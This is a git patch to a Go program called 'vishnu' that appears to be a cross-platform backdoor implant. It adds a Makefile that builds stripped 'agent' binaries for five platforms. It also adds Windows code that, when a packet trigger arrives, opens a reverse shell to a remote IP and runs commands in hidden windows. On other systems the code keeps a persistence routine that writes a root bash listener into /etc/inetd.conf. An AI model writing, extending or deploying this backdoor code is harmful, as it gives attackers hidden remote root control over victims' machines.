From 3eb2035d33151c3c154d9f5945324eba19a0a53a Mon Sep 17 00:00:00 2001 From: d3adzo Date: Fri, 14 Jan 2022 20:19:39 -0500 Subject: [PATCH] added win support, need to fix cmd window syscall error --- Makefile | 36 ++++++++++++++++++++++++ src/vishnu.go | 76 +++++++++++++++++++++++++++++++++++++++------------ 2 files changed, 94 insertions(+), 18 deletions(-) create mode 100644 Makefile diff --git a/Makefile b/Makefile new file mode 100644 index 0000000..d29eb76 --- /dev/null +++ b/Makefile @@ -0,0 +1,36 @@ +DIRECTORY=bin +MAC=macos-agent +LINUX=linux-agent +WIN=windows-agent.exe +RASP=rasp +BSD=bsd-agent +FLAGS=-ldflags "-s -w" +WIN-FLAGS=-ldflags -H=windowsgui + +all: clean create-directory agent-mac agent-linux agent-windows agent-rasp + +create-directory: + mkdir ${DIRECTORY} + +agent-mac: + echo "Compiling macos binary" + env GOOS=darwin GOARCH=amd64 go build ${FLAGS} -o ${DIRECTORY}/${MAC} src/vishnu.go + +agent-linux: + echo "Compiling Linux binary" + env GOOS=linux GOARCH=amd64 go build ${FLAGS} -o ${DIRECTORY}/${LINUX} src/vishnu.go + +agent-windows: + echo "Compiling Windows binary" + env GOOS=windows GOARCH=amd64 go build ${WIN-FLAGS} -o ${DIRECTORY}/${WIN} src/vishnu.go + +agent-rasp: + echo "Compiling RASPI binary" + env GOOS=linux GOARCH=arm GOARM=7 go build ${FLAGS} -o ${DIRECTORY}/${RASP} src/vishnu.go + +agent-fuckbsd: + echo "Compiling FUCKBSD binary" + env GOOS=freebsd GOARCH=amd64 go build ${FLAGS} -o ${DIRECTORY}/${BSD} src/vishnu.go + +clean: + rm -rf ${DIRECTORY} \ No newline at end of file diff --git a/src/vishnu.go b/src/vishnu.go index 3347461..e109311 100644 --- a/src/vishnu.go +++ b/src/vishnu.go @@ -1,6 +1,7 @@ package main import ( + "bufio" "errors" "fmt" "log" @@ -8,7 +9,10 @@ import ( "net" "os" "os/exec" + "runtime" "strconv" + "strings" + "syscall" "github.com/google/gopacket" "github.com/google/gopacket/layers" @@ -37,6 +41,9 @@ const ( ) func main() { + if runtime.GOOS == "windows" { + targetInterface = GetWinAdapter() + } // Read package and analze them handle, err := pcap.OpenLive(targetInterface, snaplen, true, pcap.BlockForever) errorPrinter(err) @@ -49,6 +56,21 @@ func main() { } } +func GetWinAdapter() string { + var iface string + output, err := exec.Command("cmd.exe", "/c", "getmac /fo csv /v | findstr Ethernet").Output() //getting ethernet description for pcap + if err != nil { + log.Panicln(err) + } + startIndex := strings.Index(string(output), "_{") + finalIndex := strings.Index(string(output), "}") + + temp := string(output)[startIndex+2 : finalIndex] + iface = "\\Device\\NPF_{" + temp + "}" + + return iface +} + func errorPrinter(err error) { if err != nil { log.Panicln(err) @@ -114,27 +136,45 @@ func connectBack(ip string) { return } - cmd := exec.Command("/bin/sh") - cmd.Stdin, cmd.Stdout, cmd.Stderr = conn, conn, conn - cmd.Run() - conn.Close() + if runtime.GOOS == "windows" { + r := bufio.NewReader(conn) + for { + order, err := r.ReadString('\n') + if nil != err { + conn.Close() + return + } + + cmd := exec.Command("cmd", "/C", order) + cmd.SysProcAttr = &syscall.SysProcAttr{HideWindow: true} + out, _ := cmd.CombinedOutput() + + conn.Write(out) + } + } else { + cmd := exec.Command("/bin/sh") + cmd.Stdin, cmd.Stdout, cmd.Stderr = conn, conn, conn + cmd.Run() + conn.Close() + } + } func vishnu(ip string) { - if connectback { + if connectback || runtime.GOOS == "windows" { connectBack(ip) + } else { + randomPort := rand.Intn(65535-100) + 100 + // println("The doors are open on port ", strconv.Itoa(randomPort)) + // Append to a file /etc/inetd.conf + fd, err := os.OpenFile("/etc/inetd.conf", os.O_APPEND|os.O_WRONLY|os.O_CREATE, 0600) + errorPrinter(err) + defer fd.Close() + + if _, err = fd.WriteString(strconv.Itoa(randomPort) + " stream tcp nowait root /bin/bash bash\n"); err != nil { + log.Panicln(err) + } + + exec.Command("/usr/sbin/inetd").Run() } - randomPort := rand.Intn(65535-100) + 100 - // println("The doors are open on port ", strconv.Itoa(randomPort)) - // Append to a file /etc/inetd.conf - fd, err := os.OpenFile("/etc/inetd.conf", os.O_APPEND|os.O_WRONLY|os.O_CREATE, 0600) - errorPrinter(err) - defer fd.Close() - - if _, err = fd.WriteString(strconv.Itoa(randomPort) + " stream tcp nowait root /bin/bash bash\n"); err != nil { - log.Panicln(err) - } - - exec.Command("/usr/sbin/inetd").Run() - }